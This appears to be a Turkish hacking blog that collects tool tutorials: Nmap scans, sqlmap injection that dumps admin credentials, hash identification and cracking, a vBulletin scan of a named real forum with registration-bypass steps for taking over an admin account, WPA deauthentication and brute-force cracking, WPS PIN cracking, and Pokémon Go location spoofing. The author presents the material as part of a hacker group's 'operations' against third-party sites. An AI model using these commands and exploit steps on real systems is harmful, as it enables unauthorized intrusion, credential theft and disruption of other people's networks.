-->

Nmap Kullanimi

Selamun Aleyküm ..
Nmap, bilgisayar ağları uzmanı Gordon Lyon (Fyodor) tarafından geliştirilmiş bir güvenlik tarayıcısıdır. Taranan ağın haritasını çıkarabilir ve ağ makinalarında çalışan servislerin durumlarını, işletim sistemlerini, portların durumlarını gözlemleyebilir.
Nmap kullanarak ağa bağlı herhangi bir bilgisayarın işletim sistemi, çalışan fiziksel aygıt tipleri, çalışma süresi, yazılımların hangi servisleri kullandığı, yazılımların sürüm numaraları, bilgisayarın güvenlik duvarına sahip olup olmadığı, ağ kartının üreticisinin adı gibi bilgiler öğrenilebilmektedir.
Nmap tamamen özgür GPL lisanslı yazılımdır ve istendiği takdirde sitesinin ilgili bölümünden kaynak kodu indirilebilmektedir. Nmap' ın kullanılabildiği işletim sistemleri LinuxWindowsMacOSSolaris, *BSD ve AmigaOS olarak sıralabilir fakat popülerliği öncelikle Linux daha sonrasında Windows' ta dır.
Kaynak : Vikipedia
Nmap herhangi bir istemci veya sunucuyu birçok farklı şekilde tarama yeteneğine sahiptir. Nmap'i güçlü kılan farklı tarama tekniklerine sahip olmasıdır. Protokol temelli (TCP, UDP, vb.) tarama yapılabileceği gibi, belirli aralıklardaki IP adresleri, alt ağlar (subnet) ve üzerlerinde çalışan port ve servisleri de taranabilir.[1]
Tarama sonuçlarında ortaya çıkabilecek port durumları aşağıdaki gibidir :
Open (Açık): Portun erişilebilir durumda olduğunu ve port üzerinde bir uygulamanın TCP bağlantılarını ya da UDP datagramlarını kabul ettiği anlamına gelmektedir.
Closed (Kapalı): Portun erişilebilir olduğunu (Paketleri almakta ve geri paket göndermekte) fakat üzerinde herhangi bir uygulamanın olmadığı anlamını taşımaktadır.
Filtered (Filtreli): Dönen tepkiler bir paket filtreleme mekanizması tarafından engellenir. Nmap portun açık olduğuna karar veremez.
Unfiltered (Filtresiz): Portlar erişilebilir ancak Nmap portların açık veya kapalı olduğuna karar veremez. (Sadece ACK scan için )
Open|filtered (Açık|Filtreli): Nmap portların açık veya filtrelenmiş olduğuna karar veremez. (UDP, IP Protocol, FIN, Null, Xmas Scan için )
Closed|filtered (Kapalı|Filtreli): Nmap portların kapalı ya da filtreli olduğuna karar veremez. (Sadece Idle Scan için )

Nmap Tarama Türleri 
TCP SYN (Half Open) Scan : 
Hedefe TCP SYN gönderilir. Portlarin Kapali Olduğu Durumlarda Hedef Makina VCevağ Olarak RST + ACK Döner.
Portlarin Açık Olduğu Durumlarda İse Hedef Makina SYN + ACK Bayrakli Segment Döndürür. Daha Sonra Kaynak Makina RST Bayrakli Segment Göndererek Bağlantiyi Koparir Ve Böylelijle TCP Üçlü El Sıkışma (TCP Three-Way Handshaking) Tamamlanmaz. Bu Tarama Türünce TCP Üçlü El Sıkışma Gerçekleşmediği İçin Bu Tarama Türü Hedef Sistemlerinde Herhangi Bir Şekilde İz Birakmaz.
Kullanım Şekli : nmap -sS -v hedef_ip_adresi

TCP Connect Scan : 
Kaynak Makinanin Gerçekleştireceği TCP Connet Scan, Kapali Portlara Yapildiği Zaman RST + ACK Bayrakli Segment Dönecektir. Ancak Açık Portlara Yapildiği Durumlarda Hedef Makinanin Göndereceği SYN + ACK Bayrakli Segmenti, Kaynak Makina ACK Bayrakli Segment Göndererek Cevaplar Ve Üçlü El Sıkışmayi Tamamlar.
Kullanım Örneği: nmap -sT -v hedef_ip_adresi

FIN (Stealth) Scan  :
Hedef Makinaya TCP Bağlanti İstegi Olmadan Gönderilen Segmentle Tarama Yapilir. Kaynak Makinanin Göndereceği FIN Bayrakli Segment, Hedef Makinanin Kapali Bir Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Açık Portuna Gelirse Hedef Makinadan Herhangi Bir Tepki Dönmeyecektir.
Kullanım Şekli : nmap -sF -v hedef_ip_adresi

Xmas Scan :
Bu Tarama Türünde Kaynak Bilgisayarin TCP Segmentine, URG,PSH Ve FIN Bayraklarini Set Edeceği ("1" Yapilacaği) Segment Hedef Makinaya Gönderilir. Eğer Kaynak Makinanin Gödereceği URG,PSH Ve FIN Bayrakli Segment, Hedef Makinanin Kapalı Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Port Açık Olursa Hedef Makinadan Herhangi Bir Tepki Dönmeycektir.
Bu Tarama Türünde TCP Başlığı İçerisinde Yer Alan Toplam Altı Adaet Bayraktan Üç Tanesi Set Edildiği ("1" yapildiği) İçin, Gönderilen Segment Yılbaşı Ağacının Yanan Lambalarina Benzetilmiştir. Bundan Dolayida  Bu Tarama Türüne Xmas (Christmas) Scan Denmiştir. 
Kullanım Şekli: nmap -sX -v hedef_ip_adresi

Null Scan : 
Hiç Bir Bayrağın Bulunmayacağı Bu Tarama Türü, Gerçek Hayatta Karşımıza Çıkmayan Bir Durumdur. Kaynak Makinan,in Gödereceği Bayraksız Segmentler Karşısında Hedef Makinanin Vereceği Tepkiler FIN Scan İle Aynıdır. Kaynak Makinanın Göndereceği Bayraksız Segment, Hedef Makinanin Kapalı Bir Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Port Açık Olursa Hedef Makinadan Herhangi Bir Tepki Dönmeycektir.
Kullanım Şekli : nmap -sN -v hedef_ip_adresi

Ping Scan : 
Bu Tarama Türünda Kaynak Makina Hedef Makinaya Tek Bir ICMP Echo İstek Paketi Gönderir. İP Adresi Erişebilir Ve ICMP Filtreleme Bulunmadığı Sürece, Hedef Makinaya ICMP Echo Cevabi Döndürecektir. Eğerü Hedef Makina Erişilebilir Değilse Veya Paket Filtreleyici ICMP Paketlerini Filtreliyorsa, Hedef Makinadan Herhangi Bir Cevap Dönmeyecektir. 
Kullanım Şekli : nmap -sP -v hedef_ip_adresi

UDP Scan : 
Kaynak Makinanın Hedef Makinaya UDP Datagramina, ICMP Port Unreachable Cevabi Döndürülüyorsa Hedef Makina Kapali Kabul Edilecektir. Herhangi Bir Tepki Döndürmeyen Hedef Makina Open|Filtered Kabul Edilecektir. UDP Datagramiyla Cevap Döndüren Hedef Makinaya Ait Port İse Açık Kabul Edikecektir.
Kullanım  Şekli : nmap -sU -v hedef_ip_adresi

IP Protocol Scan : 
Bu Tarama Türü Standart Nnamp Tarama Türlerinden Biraz Farklidir. Bu Tarama Türünde Hedef Makinalarin Üzerlerinde Çalışan IP Tabanli Protokoller Tespit Edilmektedir. Bu Yüzden Bu Tarama Türüne Tam Anlamiyla Bir Port Taramasi Demek Mümkün Değildir. Hedef Makina Üzerinde Taramasını Yaptığımız İP Protokolü Aktif Haldeyse Makinadan Bu Taramaya Herhangi Bir Cevap Gelmeyecektir. Hedef Makina Üzerinde, Taramasini Yaptıgımız IP Protokolü Aktif Halde Değilse Hedef Makinadan Bu Taramaya, Tarama Yapılan Protokolün Türüne Göre Değişebilen RST Bayrakli (RST Bayraği "1" Yapılmış) Bir Segment Cevap Olarak Gelecektir.
Kullanım Şekli : nmap -sO -v hedef_ip_adresi

ACK Scan : 
Bu Tarama Türünde Kaynak Makina Hedef Makinaya TCP ACK Bayrakli Segment Gönderir. Eğer Hedef Makina ICMP Destination Unreachable Mesajını Dönerse Ya Da Hedef Makinada Bu Taramaya Karşılık Herhangi Bir Tepki Oluşmazsa Port "filtered" Olarak Kabul Edilir. Eğer Hedef Makina RST Bayrakli Segment Döndürürse Port "unfiltered" Kabul Edilir.
Kullanım Şekli : nmap -sA -v hedef_ip_adresi

Window Scan : 
Window Scan, ACK Scan TürüneBenzer Ancak Bir Önemlii Farki Vardir. Window Scan Portlarin Açık Olma Durumlarini Yani "OPEN" Durumlarini Gösterebilir. Bu Taramanin İsmi TCP Windowing İşleminden Gelmektedir. Bazı TCP Yığınlari, RST Baraktli Segmentlere Cevap Döndüreceği Zaman, Kendilerine Özel Window Boyutlari Sağlarlar. Hedef Makinaya Ait Kapali Bir Porttan Dönen RST Segmentine Ait Window Boyutu Sifirdir. Hedef Makinaya Ait Açık Bir Porttan Dönen RST Segmentine Ait Window Boyutu Sıfırdan Farkli Olur.
Kullanım Şekli : nmap -sW -v hedef_ip_adresi

Idle Scan : 
Bu Tarama Türü Kaynak Makinanin Hedef Makinaya Tarama Esnasinda Aktif Olarak Rol Almadığı Bir Türdür. Kaynak Makina "ZOMBİ" Olarak Nitelendirilen Makinalar Üzerinden Hedef Makinayi Tarayarak Bilgi Toplar.
Kullanım Şekli : nmap -sl -v zombi_ip hedef_ip_adresi

Nmap Betik Motoru (Nmap Scripting Engine -NSE)
NSE (Nmap Script Engine) Nmapin En Güçlü Ve Kullanışlı Özelliklerinden Birisidir. NSE'yi Normal Nmap Komutlariyla Yapılamayan Yada Yapılması Çok Zor Olan İşlemlerin Daha Kolay Bir Şekilde Yapılmasının Sağlandığı Bir Betikler Bütünü Olarak Tarif Edebiliriz. Nmap İle Birlikte Bir Çok Betik Kütüphanesi Hazır Olarak Gelmektedir. NSE Kullanılarak Temel Olarak Yapılabilecekler Aşağıda Listelenmiştir.
1) Ağ Keşifleri: Hedef Etki Alanlarının Whois Veri Tabani Sorgulari Yapilabilir. Hedef Sistemlerin SNMP Sorgulari Yapılabilir Ve Mevcut NFS/SMB/RPC Paylaşım Ve Servisleri Listenilebilir.

2) Karmaşık Versiyon Tespiti: Normal Nmap Komutlariyla Hedef Sistemlerin Versiyonlari Belirlenebilmektedir. NSE İle Hedef Sistemlerin Versiyonlari Çok Daha Ayrıntili Bir Şekilde Tespit Edilebilir.
3)  Zafiyet (Vulnerability) Tespiti: Normal Nmap Komurtlariyla Hedef Sistemlerin Zafiyetleri Tam Anlamıyla Tespit Edilememektedir. NSE İle Bu Zafiyetler Daha Kolayca Belirlenebilir. Nmap İle Hazır Gelen Biir Çok Zafiyet Tespit Betiği Bulunmaktadir. Ancak Temel İşlevinin Zafiyet Tarayicisi Olmadığının Bilinmesi Gerekir.
4) Arka Kapi (Backdoor) Tespiti: NSE  Bazi Arka Kapi Programlarinida Tespit Edebilmektedir.
5)  Zafiyet Sömürmesi (Vulnerability Exploitation) NSE İle Sadece Hedef Sistemlerin Zafiyetkeri Tespit Edilmekle Kalmayip Bu Zafiyetlerin Bazıları Kullanilarak Hedef Sistemlere Sızılmasi Mümkün Olmaktadir. Fakat Nmap'in Temel Amaci Metasploit Gibi Bir Zafiyet Sömürü Programina Dönüşmek Değildir. Buna Ragmen NSE İle Hedef Sistemlerdeki Bazi Zafiyetlerin Sömürülmeside Mümkündür.NSE 'nin Geliştirilmesine Devam Edilmektedir.

Nmap Tarama Örneklei : 
nmap -sS -sV -Pn -top-ports 10 192.168.38.130
sS : Syn Taramasi 
sV : Versiyon Bilgisi
Pn : Ping Atma 
Top-ports10: En Çok Kullanilan 10 Portu Tara.
nmap -sS -sV -Pn -T4 -p- 192.168.38.130
sS : Syn Taramasi 
sV : Versiyon Bilgisi
Pn : Ping Atma 
T4 : Tarama Hizi Hizli Bir Tarama.
-p- : Tüm Portlari Tara
Bu Tarama Çok Uzun Sürdüğü İçin Hazır Taranmış Bir Ekran Görüntüsü Koyuyorum.

nmap -sS -A -Pn -oA sonuclar 51.255.10.187
sS : Syn Taramasi 
A  : Versiyon Ve İşletim Sistemi Bilgisi
Pn : Ping Atma 
oA : 3 Farkli Formatta Tarama Çıktısını Kaydeder.

nmap --script ftp-anon -p 21 51.255.10.187
script : Nmap Scriptlerini Kullanmamizi Sağlar.
ftp-anon : Ftp 'ye Anonim Girişi Olup Olmadıgını Kontrol Eder.
p 21 : Port 21 de Scripti Çalıştırır
Zafiyet Oldugunda 2.ci Komut Satirindaki Gibi Belirtir.

nmap --script http-dombased-xss www.trazer.org
script : Nmap Scriptlerini Kullanmamizi Sağlar.
http-dombased-xss : trazer.org'da xss ara
Couldn't find any DOM based XSS.=
Yani Herhangi Bir Dom Tabanli XSS Bulunamadı :) 

Ek Olarak Nmap İle cloudflare Bypass Yapabilirsiniz. Aslında Bypass Demiyelimde Otomatik Olarak Nmap Aracı İle Hedef Sistemin Dns Üzerindeki Tüm Alan Adlarina Subdomain Vs Brute Force Yapilarak Alt Alan Adlari Tespit Edilip Gerçek İp Adresi Bulunabilir. 
nmap --script dns-brute -sn hedefsite.com

Benim Size Aktarma İstediklerim Bu Kadardı Sizler İçin Sağ Soldan Toparladım Ve Bu Çıktı Ortaya
Umarım Anlaşılır Olmuştur. Nmap Scriptlerini /usr/share/nmap/script/ Klasörü Altında Bulup İnceleyebilirsiniz. Bu Yazımızda Nmap Aracının Çok Kaliteli Bir Keşif Aracı Olduğunu Uygulayip Öğrenmiş Olduk.
Nmap Kullanımı Hakkinda Daha Detayli Bilgi İçin Buradaki Linke Göz Atabilirsiniz.

TrazeR Sunar //

Sqlmap Kullanimi

Selamun Aleyküm ...

Akademi İçin Çektigim Genel Sqlmap Kullanimi,
Daha İyi Anlamanız İçin İşlemleri Numaralandırdım.



Dork Taramasi için:
1 : sqlmap.py  -g "index.php?id=" 

Veritabani Çekmek için :
2: sqlmap.py -u   "http://www.example.com/media.php?id=26"  --dbs
Veritabanındaki Tabloları Çekmek İçin : 
3: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı --tables 
Kolanları Çekmek İçin :
4: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı --columns 
Admin Bilgilerini Çekmek İçin
5: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı Admin,id,pass --dump


Ne Kadar Kısa Tutmaya Çalışsamda Video Uzadi 
Hd İzleyin


Umarım Anlaşılır Ve Yararli Olur.

Kali Linux Virtualbox İnstall

Selamun Aleyküm ..

Vİrtualbox'su Genelde Windowsa Kurar Üstüne Sanal Olarak Linux Kurup Kullanırız. Bu Gün O Alışıla Gelmiş Adeti Bozuyorum :) Tam Tersini Yapıcaz Linuxsa VirtualBox Kurup, Sanal Olarak Windows Kuracağız..
 Benim Gibi Sistemi Komple Linux Tabanlı Olan Arkadaşlar İçin İdeal Bi Konu Olacağını Düşündüğüm İçin Bu Konuyu Hazırlıyorum .. 

/etc/apt/ Dizininde Bulununan Sources.list Dosyamızı Açıp Aşağidaki Komutu Ekliyoruz.
Deb http://download.virtualbox.org/virtualbox/debian yakkety contrib


Ekleyip Kayıt Edip Çiktiktan Sonra apt-get update Komutuyla Güncelliyoruz


Ardindan  apt-get install virtualbox-5.1 Komutunu Girip Kuruyoruz.


Evet KurulumAşamasi Bitti 
Şİmdi Yan Menüde Bulunan Uygulamalari Göster Kısmına Virtual Yazarak Virtualboxsu Açıyoruz

Ve Linuxda Virtualboxsa Hoş Geldiniz :) 



Gerisini Siz Biliyosunuz ;)

TrazeR Sunar //

Kali Linux Hash-İdentifier

Selamun Aleyküm .. 

Bugun Sizlere Bi Çoğunuzun Bildiği, Yada Bilmediği, Yadaaa İlk Kez Adını Duyduğu  Hash-İdentifier 'den Bahsedeceğim.
 Aslına Bakarsanız Çok Anlatılacak Bahsedelicek Bi Durum Yok hash-identifier Şifreleme Türünü Tespit Etmeye Yarayan Bir Araçtır
Örnek Vericek Olursak; Sql İncektion Açığıyla Veritabanindan Bilgi Süzdünüz Admin Bilgisi Hash Olarak Geldi.. 
Nabıyoruz Hemen Hashkiller 'e Yada O Tarz Sitelere Girip MD5 Olarak Decode Etmeye Çalışıyoruz. Bazen Kırıyo Bazen Kıramıyor.
 Süzülen Bilginin MD5 Oldugunu Nerden Biliyoruz ? Bilmiyoruz Çünki Ezbere Giriyoz.

Linuxda Terminal Açıp
hash-identifier 
Yazıp Açıyoruz

Aracımız Açıldı 
HASH: 
Kısmına Şifrelenmiş Metni Girip Entarlıyoruz Bu Kadar
*EF9AC024048F2530A59240C62CC218EC8DA28D94


Hash Degerını Gırdık Taakkk Şifreleme Türünü Ve Algoritmasini Verdi 
MySQL 160bit - SHA-1 (SHA-1 ($pass))

Hash Türünü Tespit Ettikten Sonra Brute Force İşine Başlayalabiliriz.

Hash İdentifier Desteklenen Şifreleme Biçimleri Aşağidaki Gibidir :

  • ADLER-32
  • CRC-32
  • CRC-32B
  • CRC-16
  • CRC-16-CCITT
  • DES(Unix)
  • FCS-16
  • GHash-32-3
  • GHash-32-5
  • GOST R 34.11-94
  • Haval-160
  • Haval-192 110080 ,Haval-224 114080 ,Haval-256
  • Lineage II C4
  • Domain Cached Credentials
  • XOR-32
  • MD5(Half)
  • MD5(Middle)
  • MySQL
  • MD5(phpBB3)
  • MD5(Unix)
  • MD5(Wordpress)
  • MD5(APR)
  • Haval-128
  • MD2
  • MD4
  • MD5
  • MD5(HMAC(Wordpress))
  • NTLM
  • RAdmin v2.x
  • RipeMD-128
  • SNEFRU-128
  • Tiger-128
  • MySQL5 - SHA-1(SHA-1($pass))
  • MySQL 160bit - SHA-1(SHA-1($pass))
  • RipeMD-160
  • SHA-1
  • SHA-1(MaNGOS)
  • Tiger-160
  • Tiger-192
  • md5($pass.$salt) - Joomla
  • SHA-1(Django)
  • SHA-224
  • RipeMD-256
  • SNEFRU-256
  • md5($pass.$salt) - Joomla
  • SAM - (LM_hash:NT_hash)
  • SHA-256(Django)
  • RipeMD-320
  • SHA-384
  • SHA-256
  • SHA-384(Django)
  • SHA-512
  • Whirlpool
  • And more…



Bu Arada Yukaradaki Hashin Çözülmüş Hali Aşağidadir.

Hash                           Type           Result
*EF9AC024048F2530A59240C62CC218EC8DA28D94 MySQL4.1+ freestuff

TrazeR Sunar //

Kali Linux VBSCAN

Selamun Aleyküm .. 

Turkz Group (Sipahiler) Olarak Operasyonlarımız Devam Ediyor O Yüzden Fırsat Bulup Konu Hazırlamaya Vakit Kalmıyor.. 
Az Bi Vaktim Varken Siz Değerli Okucuyalarıma Kali Linux Üzerinde VBSCAN Aracının Kullanımından Bahsedeceğim.
OWASP VBScan Kısaca Vbulletin Siteler Üzerinde Açık Tespit Etmek İçin, Perl Programlama Dilinde Kodlanmış Bir Opensource Projesidir.

Neden OWASP VBScan?

Eğer Bir vBulletin Forumda Penetrasyon Testi Yapmak İstiyorsanız OWASP VBScan Sizin İçin En İyi Araçtir Ve En Yeni VBulletin Açıklariyla Güncelleniyor.

Cd Desktop Komutu İle Masaüstüne Geçiş Yapalim 
git clone https://github.com/rezasp/vbscan.git 
Yazarak VBScan Aracımızı Clone Bağlantısı İle Masaüstüne İndirelim.


Akabinde 
cd vbscan Yazarak İndirdiğimiz Dosyanın İçine Girelim 
ls Komutuyla Listeleyelim 
chmod +x vbscan.pl Komutuyla Gerekli İzinleri Verelim


./vbscan Yazarak Aracımızı Açalım

Aracımız Açıldı Zaten Kullanım Şeklini Usage Kısmındada Gösteriyor
./vpscan.pl hedefsite.com gibi
Şimdi Basit Bi Dork Yazalim Bi Vbulletin Sitesi Bulalım 

dork: powered by vbulletin site:nl

Bılıyosunuz nl Uzantılı Siteler Hollandanın Uzantısı Bunu Değiştirebilirsiniz Kafanıza Göre Dorku Geliştirebilirsiniz.

airwork.nl Böyle Bi Hollanda Vbulletin Sitesi Buldum Taratalim 





Gördüğünüz Gibi Bazı Testler Yaparak Bazı Sonuçlar Elde Etti 
Mesela Bi Üst Resimde Vbulletin 3.8.4 & 3.8.5 Sürümünde Register Yani Kayıt Sayfasında Bypass OIabileceğini Ve Gerekli Exploiti Bularak Bize Sundu.
Exploit Bu Girip Bakalım 


Kullanım Parametlerini Exploitde Söylemıs Zaten Yinede Bi Özet Geçelim hedefsite.com/register.php Ye Girin Üye Olun Diyor
Üye Olurken Kullanıcı Adını : ADMIN&#00  Yapın 
Diğer Parametreleri Tamamlayıp Kayıt Edin.
Sonra Admin Paneline Girip 
vBulletin Seçenekleri'niTıklayın Sansür Seçeneğini Seçin  Sekanslı Kelimeler Bölümünde  & # Yazın
Kaydetin Çıkın Gerisi Size Kalmış 

Bu Aracın Ve Exploitin Kullanımı Bu Şekildir Umarım Anlaşılır Olmuştur.

DİPNOT: Activeperl İndirerek Bu Aracı Windows Üzerindede Kullanabilirsiniz.

TrazeR Sunar //

Kali Linux Grabber

Selamun Aleyküm ...

Grabber Belirtilen Adreste SQL XSS BSQL BACKUP Gibi Açıkları Taramaya Yarar
Uzun Uzun Anlatmaya Gerek Yok Kullanışlı Basit Güzel Bi Araçtir



Kullanim Şekli Ve Parametreleri Aşağidaki Gibidir Bu Pencereye Terminalde grabber -h Yazarak Ulaşabilirsiniz.

Kullanımı: grabber.py [seçenekler]

Seçenekler:
   -h, --help bu yardım mesajını gösterir ve çıkar
   -u ARCHIVES_URL, --url = ARCHIVES_URL Adres Araştırmak için
   -s, --sql, SQL Enjeksiyonunu Arar
   -x, --xss XSS Saldırılarını Gerçekleştirir
   -b, --bsql Kör SQL Enjeksiyonu'nu Ara
   -z, --backup Yedek dosyaları ara
   -d SPIDER, --spider = SPIDER  Her dosyayı ara
   -i, --include Dosya Yerleştirme saldırılarını gerçekleştirir
   -j, --javascript Javascript kodunu test edin?
   -c, --crystal Basit kristal top testi.
   -e, --session Oturum değerlendirmeleri


Örnek:
grabber --spider 1 --sql --xss -url http://www.hedefsite.com/



Wifislax Wifi Metropolis 3 İle Wifi Hacking

Selamun Aleyküm

WifiSlax İşletim Sisteminde Bulunan Wifimetropolis 3 (Gui wpa/web & wps) İle Wpa Hacking Yapımını Gösterdim Bu Aracın Özelliği Wordlisti Kendi Oluşturuyor
 Oluşan Wordlisti Ayni Anda Aircrack İle Denemesini Sağlıyor Siz Handshakeyi Yakaladıktan Sonra Oluşak Wordlistin En Az Kaç, En Çok Kaç Haneden Ve Hangi Harf Rakamdan Oluşacağını Belirttikten Sonra Şifre Denemelerine Başlıyor.


Sol Alta Bulunan Ayarlar Butonuna Tıklayarak Resimdeki İşaretlenmiş Kısımlardan Aracımıza Ulaşıp Açıyoruz.

Bu Kısımdan Ağ Kartimi Monitör Moduna Alıyoruz Ardından 2 İle Belirtiğim Yerden Scanner Butonuna Basıyoruz

Scanner Butonuna Bastıktan Sonra ALL Butonuna Basarak Bütün Ağları Listelemesini İstiyoruz
Buradan Hedef Belirttikten Sonra ctrl + c Tusuyla Yada Ok İle Belirtilen Yerden X 'e Basarak Kapatiyoruz.

Kapattıktan Sonra Hedefimizin İsmine Bi Kez Tıklıyoruz Tıkladıktan Sonra Hedefin AP NAame Kısmında Olduguna Dikkat Edin. Buradaki Hedef WPA Olduğu İçin WPA Butonuna Tıklıyoruz

Buradan Capture Data 'ya Basıyoruz Handshake Yakalaması Icın Beklıyoruz


Yakalamazsa 2 İle Belirtiğim DesAutenticacion Butonuna Basarak Yakalaması Icın Bekliyoruz.

Bütün Kullanicilari Düşürerek Handshake Yakaladi. Artık Bu Pencereyi Kapatiyoruz.

Bu Kısımdan Aircrack + Crunch Butonuna Tıklayarak Bi Wordlist Belirtiyoruz. Ben Burada 0123456789ABCDEF ... Kullanarak Sifre Oluşturmasını İstiyorum Siz Sadece Sayilardan Oluşmasini İstiyorsanız 0123456789 'u Seçmelisiniz. Wordlisti Seçtikten Sonra Crunch Yazan  Yerin Yanindaki Kutucuklardan Oluşacak Olan Wordlistin En Az Kaç Ve En Çok Haneden Oluşacağını Belirtikten Sonra Aircrack NG Butonuna Basarak Sözlük Saldirimizi Başlatıyoruz.

Sözlük Saldırımız Başladı Rastgele Şifreler Üreterek Deniyor Şuanda Şifreyi Buldugu Zamanda İse Bu Ekranda Yani Current passphrase Kısmında Key Found Olarak Gösteriyor.




TrazeR Sundu //
ip adresi

Kali Ve Linux Eğitimi PDF


Selamun Aleyküm ..

Elimde Bulunan Kali Ve Linux Eğitimini Sizlerle Paylaşmak İstedim

 Kali Linux Kitap Totelde 255 Sayfadan Oluşmaktadir

En Güzel Yani İse Türkçe Olmasıdır

İçinde Wmware Kurulumu Virtual Box Kurulumu, Komutlar Hakkında Bilgiler, Bazi Araçların Kullanımı

 Tanıtımı,Network Ayarları,Servisler, Kullanıcı Yönetimleri,Dosya Dizin İşlemleri,Paket Yönetimleri, Sqlmap, 

Nmap, W3af,Nikto, Maltego, Hashcat,Hydra, Aircrack Araçlari, Vs Vs..

Linuxla İlgilenen Linuxsa İlgi Duyan Arkadaşlarımın Çok İşine Yarıyacaktır.





Yandex 
 İndirmek İçin Tıkla






WifiSlax GoyScrpit WPS Hack



 Wi-Fi Protected Setup (WPS) Bilgisiz Kullanıcıların Router Ve Wlan Modemlerde
Kolaylıkla Kablosuz Ağ Ayarlarını Yapmaları İçin Tasarlanmış Bir Teknolojidir.

Bu Teknoloji Çıktığında Başladı Güvenlik Zafiyeti (:  
WPS Açığı Bulunan Modemlerde 8 Haneli PİN Numarası Vardır
Dolasıyla Bu Pin Numarasını Bulduğunuz, Kırdığınız Zaman Size Otomatikman Wi-fi Şifresinide Veriyor. Siz Dilediğiniz Kadar Büyük Küçük Harf ,Rakam Oluşan Bi Şifre Oluşturun Modeminiz WPS Destekli İse Şifrenizi Kolaylıkla Elde Edebilirler.






Korunmak İçin : WPS Kapatın, Yazılım Güncellemesi Yapın En Azından 60 Sn Koruması Sağlar.
ip adresi

Kali Linux Wafw00f Kullanimi

toplist

Selamun Aleyküm Bügün Sizlere Kali Linux Üzerinde Bulunan Wafw00f ( WAFW00F - Web Application Firewall Detection Tool) Aracinin Kullanimini Göstereceğim..

   Wafw00f Nedir Diyecek Olursak Belirtilen Sitede Güvenlik (Firewall) Duvarı Olup Olmadığını Gösteren, Pentestler İçin Önem Arz Eden Bir Araçtır.

Kali Linuxda Terminalimizi Açarak 

" wafw00f -h " 
Yazarak Tool'un Kullanimi Hakkinda Bilgi Alabiliriz.




Genel Kullanim Şekli wafw00f -a http://www.hedefsite.com/  Şeklindedir.

Örnekle Gösterelim.

Buradaki Diyorki Belirtilen Site Bir CloudFlare Arkasinda.
CloudFlare Nedir Diyecek Olursak Web Sitemizi  Ddos SQL İnjection Ve Spam Olarak Adlandirilan Saldirilardan Korumaya Yarar.

Genel Tespit Olarak Belirtilen Sitenin Güvenlik Duvari Olduğunu Gösteriyor
Bu Aracin Kullanimi Bu Şekildedir.

TrazeR Sundu.

Bilgisayarda Pokemon Go Oynama


Tüm Dünyada Ses Getiren Ve Hala Ülkemize Sunulmayan Pokemon Oyununu

Siz Okuyuclarım İçin Bilgisayara Kurulumunu Ve Fake GPS İle Nasıl Oynanacagını Gösterecegim 

Etik Mi ? Tabiki Değil Ancak Zaten Bi Çok Oyuncu Bu Şekilde Oynuyor Bilmem Kaç Derece 
Sıcakta Dışarıda Deli Gibi Pokemon Kovalamanıza Gerek Yok Artık.

İlk Olarak Şu Programı Bilgisayariniza İndirip Kurunuz

Onun Kurulumundan Bahsetmeyeceğim Basit Zaten İnstall Dedinizmi Kendisi Kuruyor.

Nox App Player Dowloand

Pokemon Go Dowloand

Pokemon Go Altarnatif Dowloand

Ardından Programımızı Açalım Ufak Tefek Ayarlarımızı Yapalım



Buradan Sag Üst Kösede Bulunan Sistem Setting (Ayarlar) 'a Giriyoruz.



Açılan Yeni Pencerede General Kısmından Root Ayarımızı Açık Hale Getiriyoruz.



Properties Kısmından Cihazimi Hangi Marka Model Olarak Kullanmak İstiyorsak Ayarlarımızı Yapıyoruz Bu Cihaz Samsung T285 Burada Dikkat Etmeniz Gereken Yer Save Changes Butonu Isımız Bıttıkten Sonra Kayıt Yapacagız Tum Islemleri Onun İçin Buradada Save Changes Butonunu KULLANMIYORUZ



İnterface Kısmından Virtual buttons at the bottom Seçenegini İşaretliyoruz Ve Save Changes Diyerek Sistemimizi Tekrar Başlatıyoruz


Restart Now Diyerek Tekrar Başlatıyoruz.


Evet Sistemimiz Açıldı Artık Pokemon Go yu Yukleme Kısmına Geldik.
OK İşaretinin Belirttiği Yerde Apk Dosya Yükleyicimiz Var Oraya Tıklıyoruz


Pokemon Go Apk Dosyamızın Bulundugu Yeri Göstererek Aç Diyoruz



Oyunumuzun Açılmasını Beklıyoruz


Googleyi Seçip Google Hesabımızla Oyuna Giriş Yapalım..




Evvet Dostlar Oyunumuz Açıldı


Yukarıda Ok İle Belirtiğim Yerden Konumuzunu Ayarlayabilirsiniz Bu Sekilde Konumda Değişiklikler Yaparak İlerleyip Pokemon Avına Çıkabilirsiniz . Lokasyon Degısrırken Alttaki OK Butonuna Tıklamayı Unutmayın.



Şunuda Unutmayın Ki Bir Anda Çok Uzaklara Işınlanmayın BAN Yiyebilirsiniz:)

TrazeR Sundu